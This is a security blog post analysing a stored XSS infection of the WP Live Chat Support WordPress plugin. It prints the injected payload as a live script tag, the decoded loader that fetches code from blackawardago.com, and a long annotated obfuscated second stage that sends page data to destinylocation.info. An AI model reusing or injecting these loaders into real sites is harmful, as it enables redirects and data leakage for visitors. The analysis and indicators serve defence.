Demystifying the WP Live Chat Support WordPress Redirect Hack

The recent WordPress JavaScript Redirect hack took everyone by surprise. Through an XSS JavaScript injection, the following malicious code was written into a WP Live Chat Support plugin option:

<!--
  Sample of the injected value, shown for analysis only.
  The eval(String.fromCharCode(...)) wrapper stores the real loader as a list
  of decimal character codes, so nothing readable (no URL, no "createElement")
  appears in the stored text. The literal prefix "eval(String.fromCharCode(" is
  therefore a practical search string when checking stored plugin options and
  rendered pages for this infection.
  To read it, convert the numbers to text in an offline tool instead of letting
  a browser run it.
-->
<script>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script>

Converting the character codes back to text gives the following loader:

// Decoded first-stage loader (the text that the character codes in the
// injected <script> spell out). Its only job is to add one more <script>
// element whose source is a remote host, so the visible injection stays small
// while the real behaviour is served from elsewhere.
var d = document;
var s = d.createElement('script');
s.type = 'text/javascript';
s.async = true;
// Remote host for the next stage: an indicator to look for in proxy/DNS logs
// and page source. In the raw payload this string is itself built with a
// nested String.fromCharCode call, so the host name never appears in clear.
var pl = 'https://blackawardago.com';
// Full request path requested from that host.
s.src = pl + '/stat.js?l=11&';
// Placement: next to the currently running script when the browser exposes
// document.currentScript, otherwise appended to the first <head> element.
if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
    d.getElementsByTagName('head')[0].appendChild(s);
}

The injected script further executes a script from an external domain:

// Encrypted string table. Every entry is base64 text; the strings the script
// really uses (property and method names) are recovered from it at run time by
// the decoder function that follows, using an index and a per-call key.
var asda324_0x1303 = ['XMOpKMO6CsK/wrjCi8Khw799IcOs', 'w5TDpcKKXMO5dGHDqsKSdENQEg==', 'W8OJwrZqw4x2woHDtMKLNA==', 'wqfDo2TCssOIA8OuQMK2w6nDsio=', 'woTDkcOUA8KmZF0Hw53DtMKEw7Yj', 'w7DCgkfCnMOyesKRcsKEw6AIw4XDh8KtD05Mw7vDvCY=', 'wqDCqcKfUg==', 'P1DCqGnCsMKjwoQcHjtd', 'd3nCt8OMwpUJw6/DuSB5LWQt', 'b8O9d8KyCBM=', 'wq/CtA5T', 'ZsOpCMKqIwEcZS8rw5t7ScK9OA==', 'w6XCmsOcw77CuA==', 'STJp', 'EMO2KcKlCcK4wqDCvcO9w75xDsOqJzEXw6HCkMOXw4lU', 'wqTDvsO8woFSK384', 'w4XCrBBSw4ocWk4Aw6fDr8OtwpsAw5nDg3A=', 'BsKUw4sGVA==', 'wovDi8OFEMK3Y0Y6', 'wrDDt8OhwqVKYA==', 'w67CqsKMW8Obwq7Cq8KTw73DkgDDlcKZwopkwqYXwq3CqH7DmMOdfmA7fTFOw74/w4DCrsKJwqzCmcOsWjnDmgF6wo3Dsl1nUsKwNMOTwpQfw6HCtw=='];
// Start-up routine: receives the string table and a count (0x12e). Its real
// effect is to rotate the table so later indexes point at the right entries;
// that rotation is hidden behind cookie-named decoys and a check on the
// routine's own source text. No document.cookie access appears in this block.
(function (_0x9ba1ca, _0x627fa3) {
    // Rotation helper: moves the first table entry to the end, (n - 1) times.
    var _0x5a6d17 = function (_0xf41afb) {
        while (--_0xf41afb) {
            _0x9ba1ca['push'](_0x9ba1ca['shift']());
        }
    };
    var _0x5b8b55 = function () {
        var _0xb1b8e4 = {
            'data': {
                'key': 'cookie',
                'value': 'timeout'
            },
            // Trap branch. The loop appends to the array it is walking and
            // refreshes its length bound on every pass, so the bound always
            // stays ahead of the index and the loop does not finish. The
            // "cookie" string is written to a throwaway object, not the page.
            'setCookie': function (_0x5e3390, _0x439f4c, _0x49bcfb, _0x542ade) {
                _0x542ade = _0x542ade || {};
                var _0x580efc = _0x439f4c + '=' + _0x49bcfb;
                var _0x1d6449 = 0x0;
                for (var _0x1d6449 = 0x0, _0x1eed62 = _0x5e3390['length']; _0x1d6449 < _0x1eed62; _0x1d6449++) {
                    var _0x149ebe = _0x5e3390[_0x1d6449];
                    _0x580efc += ';\x20' + _0x149ebe;
                    var _0x8dad4b = _0x5e3390[_0x149ebe];
                    _0x5e3390['push'](_0x8dad4b);
                    _0x1eed62 = _0x5e3390['length'];
                    if (_0x8dad4b !== !![]) {
                        _0x580efc += '=' + _0x8dad4b;
                    }
                }
                _0x542ade['cookie'] = _0x580efc;
            },
            'removeCookie': function () {
                return 'dev';
            },
            // Normal branch. The regular expression built here is never
            // matched against anything; the line that matters is the call
            // that runs the rotation helper with (count + 1).
            'getCookie': function (_0x2fbfb9, _0x2ec0d0) {
                _0x2fbfb9 = _0x2fbfb9 || function (_0x273424) {
                    return _0x273424;
                };
                var _0x1159b3 = _0x2fbfb9(new RegExp('(?:^|;\x20)' + _0x2ec0d0['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)'));
                var _0x1aff37 = function (_0xc8c32e, _0x809377) {
                    _0xc8c32e(++_0x809377);
                };
                _0x1aff37(_0x5a6d17, _0x627fa3);
                return _0x1159b3 ? decodeURIComponent(_0x1159b3[0x1]) : undefined;
            }
        };
        // Source-text check: tests whether removeCookie's own source still has
        // the single-line shape `name () {word 'text';}`. The pattern's `.+`
        // does not cross line breaks, so reformatted (multi-line) source, such
        // as the listing shown here, does not match.
        var _0x1b7a3c = function () {
            var _0x24e663 = new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');
            return _0x24e663['test'](_0xb1b8e4['removeCookie']['toString']());
        };
        _0xb1b8e4['updateCookie'] = _0x1b7a3c;
        var _0x24de12 = '';
        var _0x835eba = _0xb1b8e4['updateCookie']();
        // Check failed -> trap branch; check passed -> rotation branch.
        // The final else can never run (the first two conditions are
        // complements of each other).
        if (!_0x835eba) {
            _0xb1b8e4['setCookie'](['*'], 'counter', 0x1);
        } else if (_0x835eba) {
            _0x24de12 = _0xb1b8e4['getCookie'](null, 'counter');
        } else {
            _0xb1b8e4['removeCookie']();
        }
    };
    _0x5b8b55();
}(asda324_0x1303, 0x12e));
// String decoder. asda324_0x4cb2(index, key) returns the plaintext of string
// table entry `index`, decrypted with `key`. Results are cached per index, so
// each entry is decrypted at most once. Every readable name the script needs
// goes through this function, which is why no API names appear in clear text.
var asda324_0x4cb2 = function (_0x29eed8, _0x4bb4aa) {
    // Index arrives as a string such as '0x1f'; subtracting 0 makes it a number.
    _0x29eed8 = _0x29eed8 - 0x0;
    var _0x47e29c = asda324_0x1303[_0x29eed8];
    // One-time setup, guarded by the 'NsTdPR' flag stored on the function itself.
    if (asda324_0x4cb2['NsTdPR'] === undefined) {
        (function () {
            // Obtain the global object through the Function constructor,
            // falling back to `window` if that throws.
            var _0x5c7714 = function () {
                var _0x5a1e24;
                try {
                    _0x5a1e24 = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');')();
                } catch (_0x4137f9) {
                    _0x5a1e24 = window;
                }
                return _0x5a1e24;
            };
            var _0xf95cb6 = _0x5c7714();
            var _0x5efe8a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
            // Base64 decoder installed as `atob` only when the environment
            // does not already provide one.
            _0xf95cb6['atob'] || (_0xf95cb6['atob'] = function (_0xf16509) {
                var _0x2d43da = String(_0xf16509)['replace'](/=+$/, '');
                for (var _0x300004 = 0x0, _0x1c3eba, _0x3627ba, _0x148cc7 = 0x0, _0x376f31 = ''; _0x3627ba = _0x2d43da['charAt'](_0x148cc7++); ~_0x3627ba && (_0x1c3eba = _0x300004 % 0x4 ? _0x1c3eba * 0x40 + _0x3627ba : _0x3627ba, _0x300004++ % 0x4) ? _0x376f31 += String['fromCharCode'](0xff & _0x1c3eba >> (-0x2 * _0x300004 & 0x6)) : 0x0) {
                    _0x3627ba = _0x5efe8a['indexOf'](_0x3627ba);
                }
                return _0x376f31;
            });
        }());
        // Decryption routine: base64-decode the entry, re-read the bytes as
        // UTF-8 (percent-encode each byte, then decodeURIComponent), and
        // decrypt with RC4 using the caller-supplied key.
        var _0x3d860b = function (_0x51ef2b, _0x4bb4aa) {
            var _0x2ba463 = [],
                _0x112bcc = 0x0,
                _0x25da2d, _0x214082 = '',
                _0x3d73c5 = '';
            _0x51ef2b = atob(_0x51ef2b);
            for (var _0x392625 = 0x0, _0x1f1a31 = _0x51ef2b['length']; _0x392625 < _0x1f1a31; _0x392625++) {
                _0x3d73c5 += '%' + ('00' + _0x51ef2b['charCodeAt'](_0x392625)['toString'](0x10))['slice'](-0x2);
            }
            _0x51ef2b = decodeURIComponent(_0x3d73c5);
            // RC4 state: identity permutation of 0..255.
            for (var _0x3eff4a = 0x0; _0x3eff4a < 0x100; _0x3eff4a++) {
                _0x2ba463[_0x3eff4a] = _0x3eff4a;
            }
            // RC4 key schedule: mix the key characters into the permutation.
            for (_0x3eff4a = 0x0; _0x3eff4a < 0x100; _0x3eff4a++) {
                _0x112bcc = (_0x112bcc + _0x2ba463[_0x3eff4a] + _0x4bb4aa['charCodeAt'](_0x3eff4a % _0x4bb4aa['length'])) % 0x100;
                _0x25da2d = _0x2ba463[_0x3eff4a];
                _0x2ba463[_0x3eff4a] = _0x2ba463[_0x112bcc];
                _0x2ba463[_0x112bcc] = _0x25da2d;
            }
            _0x3eff4a = 0x0;
            _0x112bcc = 0x0;
            // RC4 keystream: one keystream byte XORed into each input character.
            for (var _0xff0240 = 0x0; _0xff0240 < _0x51ef2b['length']; _0xff0240++) {
                _0x3eff4a = (_0x3eff4a + 0x1) % 0x100;
                _0x112bcc = (_0x112bcc + _0x2ba463[_0x3eff4a]) % 0x100;
                _0x25da2d = _0x2ba463[_0x3eff4a];
                _0x2ba463[_0x3eff4a] = _0x2ba463[_0x112bcc];
                _0x2ba463[_0x112bcc] = _0x25da2d;
                _0x214082 += String['fromCharCode'](_0x51ef2b['charCodeAt'](_0xff0240) ^ _0x2ba463[(_0x2ba463[_0x3eff4a] + _0x2ba463[_0x112bcc]) % 0x100]);
            }
            return _0x214082;
        };
        asda324_0x4cb2['pIQZFe'] = _0x3d860b;   // decryption routine
        asda324_0x4cb2['OfdOiw'] = {};          // plaintext cache, keyed by index
        asda324_0x4cb2['NsTdPR'] = !![];        // setup-done flag
    }
    var _0x65045d = asda324_0x4cb2['OfdOiw'][_0x29eed8];
    if (_0x65045d === undefined) {
        // Second source-text check, run once (flag 'ajNdHX') on the first
        // cache miss. It applies the same single-line pattern to the source of
        // the small HnWQpH function.
        if (asda324_0x4cb2['ajNdHX'] === undefined) {
            var _0x523b9e = function (_0x4d2a5c) {
                this['GEpTNA'] = _0x4d2a5c;
                this['xkNljo'] = [0x1, 0x0, 0x0];
                this['HnWQpH'] = function () {
                    return 'newState';
                };
                this['HyHfMw'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*';
                this['Jyyuco'] = '[\x27|\x22].+[\x27|\x22];?\x20*}';
            };
            // Decrements one of two counters depending on whether the pattern
            // matches, and hands the result to apcbsE.
            _0x523b9e['prototype']['DEqELG'] = function () {
                var _0x5aa6c2 = new RegExp(this['HyHfMw'] + this['Jyyuco']);
                var _0x56f50 = _0x5aa6c2['test'](this['HnWQpH']['toString']()) ? --this['xkNljo'][0x1] : --this['xkNljo'][0x0];
                return this['apcbsE'](_0x56f50);
            };
            // Returns straight away only for -1 (the pattern-matched case);
            // any other value falls through to bKQVMt.
            _0x523b9e['prototype']['apcbsE'] = function (_0x29ffbb) {
                if (!Boolean(~_0x29ffbb)) {
                    return _0x29ffbb;
                }
                return this['bKQVMt'](this['GEpTNA']);
            };
            // Trap: the loop appends to the array it iterates and refreshes
            // its bound each pass, so the return below is not reached.
            _0x523b9e['prototype']['bKQVMt'] = function (_0x500164) {
                for (var _0x5874fc = 0x0, _0x4696f6 = this['xkNljo']['length']; _0x5874fc < _0x4696f6; _0x5874fc++) {
                    this['xkNljo']['push'](Math['round'](Math['random']()));
                    _0x4696f6 = this['xkNljo']['length'];
                }
                return _0x500164(this['xkNljo'][0x0]);
            };
            new _0x523b9e(asda324_0x4cb2)['DEqELG']();
            asda324_0x4cb2['ajNdHX'] = !![];
        }
        // Cache miss: decrypt the entry and remember the plaintext.
        _0x47e29c = asda324_0x4cb2['pIQZFe'](_0x47e29c, _0x4bb4aa);
        asda324_0x4cb2['OfdOiw'][_0x29eed8] = _0x47e29c;
    } else {
        _0x47e29c = _0x65045d;
    }
    return _0x47e29c;
};
// "Run once" wrapper factory. The immediately-invoked outer function keeps a
// private first-use flag. The first call to the returned function yields a
// wrapper that applies the given callback to the given context a single time
// (the callback reference is cleared after use); every later call yields an
// empty function.
var _0x3762dc = function () {
    var _0x2d8f05 = !![];
    return function (_0x4b81bb, _0x4d74cb) {
        var _0x32719f = _0x2d8f05 ? function () {
            if (_0x4d74cb) {
                var _0x2dc776 = _0x4d74cb['apply'](_0x4b81bb, arguments);
                // Drop the callback so a second invocation does nothing.
                _0x4d74cb = null;
                return _0x2dc776;
            }
        } : function () {};
        _0x2d8f05 = ![];
        return _0x32719f;
    };
}();
// Third source-text check, wrapped by the run-once factory and invoked right
// after it is defined. It inspects the source of two tiny functions to decide
// whether the script text has been reformatted or had its hex escapes decoded,
// and picks the argument for the helper pair below accordingly.
var _0x51ee37 = _0x3762dc(this, function () {
    var _0x546267 = function () {
            return '\x64\x65\x76';
        },
        _0x309aec = function () {
            return '\x77\x69\x6e\x64\x6f\x77';
        };
    // True when the first function's source no longer matches the single-line
    // pattern `name () {word 'text';}` (the hex string is that same pattern).
    var _0x32dbd4 = function () {
        var _0x44795b = new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');
        return !_0x44795b['\x74\x65\x73\x74'](_0x546267['\x74\x6f\x53\x74\x72\x69\x6e\x67']());
    };
    // True when the second function's source still contains \x.. or \u....
    // escape sequences (pattern decodes to `(\\[x|u](\w){2,4})+`).
    var _0x1142aa = function () {
        var _0x534564 = new RegExp('\x28\x5c\x5c\x5b\x78\x7c\x75\x5d\x28\x5c\x77\x29\x7b\x32\x2c\x34\x7d\x29\x2b');
        return _0x534564['\x74\x65\x73\x74'](_0x309aec['\x74\x6f\x53\x74\x72\x69\x6e\x67']());
    };
    // Helper pair that call each other. `0xff % 0x0` is NaN, so the shift
    // amounts are NaN and the constants reduce to 0 here and 3 in the second
    // helper. The comparison inside indexOf() is always false, so this helper
    // always hands over to the second one.
    var _0x30c941 = function (_0x29fb7a) {
        var _0x410fa2 = ~-0x1 >> 0x1 + 0xff % 0x0;
        if (_0x29fb7a['\x69\x6e\x64\x65\x78\x4f\x66']('\x69' === _0x410fa2)) {
            _0x3bbd4b(_0x29fb7a);
        }
    };
    // Stops only when the letter 'e' (fourth character of "true") sits at
    // position 3 of the argument; otherwise it calls the first helper again.
    var _0x3bbd4b = function (_0x3f1171) {
        var _0x591a06 = ~-0x4 >> 0x1 + 0xff % 0x0;
        if (_0x3f1171['\x69\x6e\x64\x65\x78\x4f\x66']((!![] + '')[0x3]) !== _0x591a06) {
            _0x30c941(_0x3f1171);
        }
    };
    // Only the middle call passes the plain Latin string, for which the helper
    // pair stops. The other two pass a look-alike containing U+0435 (Cyrillic)
    // in place of 'e', for which the pair keeps calling each other with no
    // stopping condition.
    if (!_0x32dbd4()) {
        if (!_0x1142aa()) {
            _0x30c941('\x69\x6e\x64\u0435\x78\x4f\x66');
        } else {
            _0x30c941('\x69\x6e\x64\x65\x78\x4f\x66');
        }
    } else {
        _0x30c941('\x69\x6e\x64\u0435\x78\x4f\x66');
    }
});
_0x51ee37();
// Second-stage loader: the part of this script that has an effect on the page.
// All property and method names are fetched through the string decoder, so
// they are not readable in this listing. NOTE(review): the statement shape
// mirrors the decoded first-stage loader shown earlier on the page (create an
// element, set three properties, insert it next to the current script or into
// another element) - confirm the decrypted names in an isolated sandbox.
var asda324_0x1feb8b = document;
var asda324_0x4820e9 = asda324_0x1feb8b[asda324_0x4cb2('0x0', 'VH2(')](asda324_0x4cb2('0x1', 'p7VC'));
asda324_0x4820e9[asda324_0x4cb2('0x2', 'Wpa[')] = asda324_0x4cb2('0x3', 'D$[T');
asda324_0x4820e9[asda324_0x4cb2('0x4', 'SlRo')] = !![];
// The hex character codes spell the host "https://destinylocation[.]info"
// (defanged in this comment): an indicator for log searches and blocklists.
var asda324_0x2fc528 = String['fromCharCode'](0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x64, 0x65, 0x73, 0x74, 0x69, 0x6e, 0x79, 0x6c, 0x6f, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x2e, 0x69, 0x6e, 0x66, 0x6f);
// The request URL is host + path, followed by two URI-encoded `document`
// properties and one nested `window` property with its first '?' replaced by
// '&'. Data about the visited page is therefore sent to the remote host with
// the request. Which properties these are is not visible without decrypting
// the names - presumably referrer/title/location-style values; TODO confirm.
asda324_0x4820e9[asda324_0x4cb2('0x5', 'ftp[')] = asda324_0x2fc528 + asda324_0x4cb2('0x6', ']s2[') + encodeURIComponent(document[asda324_0x4cb2('0x7', '(Mk]')]) + asda324_0x4cb2('0x8', '2LZ^') + encodeURIComponent(document[asda324_0x4cb2('0x9', 'fSHN')]) + '&' + window[asda324_0x4cb2('0xa', 'NUI@')][asda324_0x4cb2('0xb', 'oiFB')]['replace']('?', '&') + asda324_0x4cb2('0xc', 'BX94');
// Two placement paths, chosen by whether a `document` property is present.
if (document[asda324_0x4cb2('0xd', ']s2[')]) {
    document[asda324_0x4cb2('0xe', 'Al0T')][asda324_0x4cb2('0xf', 'YuK2')][asda324_0x4cb2('0x10', 'eRkX')](asda324_0x4820e9, document[asda324_0x4cb2('0x11', 'NUI@')]);
} else {
    asda324_0x1feb8b[asda324_0x4cb2('0x12', 'wuSN')](asda324_0x4cb2('0x13', 'BX94'))[0x0][asda324_0x4cb2('0x14', '(Z#i')](asda324_0x4820e9);
}

The end result is a malicious redirect that sends visitors to random sites urging them to download software.

As of yesterday, the WP Live Chat Support plugin had 60,000+ active installs according to the WordPress plugin repository, and it has been disabled for new installs.

As a result of this WordPress hack, Google flagged many sites as malicious and also disabled the Google Ads campaigns of many publishers.

The solution is not just to disable the rogue plugin but also to clean up the WordPress database infection. If you need assistance, you can consider our WP Malware Removal Service.


About the author: Shiv —That which is not…. Shiv is a software security engineer running 18yrs+ into his career.
